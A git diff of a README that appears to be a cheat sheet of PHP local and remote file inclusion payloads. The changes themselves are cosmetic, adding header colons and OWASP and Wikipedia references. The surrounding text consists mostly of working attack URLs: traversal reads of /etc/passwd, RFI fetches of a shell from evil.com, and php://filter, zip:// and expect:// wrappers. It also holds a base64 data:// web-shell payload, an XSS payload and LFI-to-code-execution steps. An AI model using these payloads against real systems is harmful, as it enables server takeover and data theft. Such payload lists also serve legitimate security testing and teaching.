diff --git a/README.md b/README.md index d7daac9..84d7ed3 100644 --- a/README.md +++ b/README.md @@ -88,7 +88,7 @@ return ($ input); Now I hope you can see what’s going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy! -#### Basic LFI (null byte, double encoding and other tricks) +#### Basic LFI (null byte, double encoding and other tricks) : ``` http://example.com/index.php?page=etc/passwd @@ -114,7 +114,7 @@ Interesting files to check out : /proc/cmdline ``` -#### Basic RFI (null byte, double encoding and other tricks) +#### Basic RFI (null byte, double encoding and other tricks) : ``` http://example.com/index.php?page=http://evil.com/shell.txt @@ -122,7 +122,7 @@ http://example.com/index.php?page=http://evil.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` -#### LFI / RFI Wrappers +#### LFI / RFI Wrappers : LFI Wrapper rot13 and base64 - php://filter case insensitive. @@ -135,7 +135,7 @@ Can be chained with a compression wrapper. http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` -#### LFI Wrapper ZIP +#### LFI Wrapper ZIP : ``` echo "" > payload.php; @@ -146,32 +146,44 @@ rm payload.php http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` -#### RFI Wrapper DATA with "" payload +#### RFI Wrapper DATA with "" payload : ``` http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= ``` -#### RFI Wrapper EXPECT +#### RFI Wrapper EXPECT : ``` http://example.com/index.php?page=php:expect://id http://example.com/index.php?page=php:expect://ls ``` -#### XSS via RFI/LFI with "" payload +#### XSS via RFI/LFI with "" payload : ``` http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ ``` -#### LFI to RCE via /proc/*/fd +#### LFI to RCE via /proc/*/fd : 1. Upload a lot of shells (for example : 100) 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) -#### LFI to RCE via Upload +#### LFI to RCE via Upload : ``` http://example.com/index.php?page=path/to/uploaded/file.png ``` + +#### References : + +πŸ‘‰ [Testing for Local File Inclusion](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) + +πŸ‘‰ [Wikipedia](www.wikipedia.org/wiki/Local_File_Inclusion) + +πŸ‘‰ [Remote File Inclusion](http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion) + +πŸ‘‰ [Wikipedia: "Remote File Inclusion"](http://en.wikipedia.org/wiki/Remote_File_Inclusion) + +πŸ‘‰ [PHP File Inclusion](https://www.owasp.org/index.php/PHP_File_Inclusion)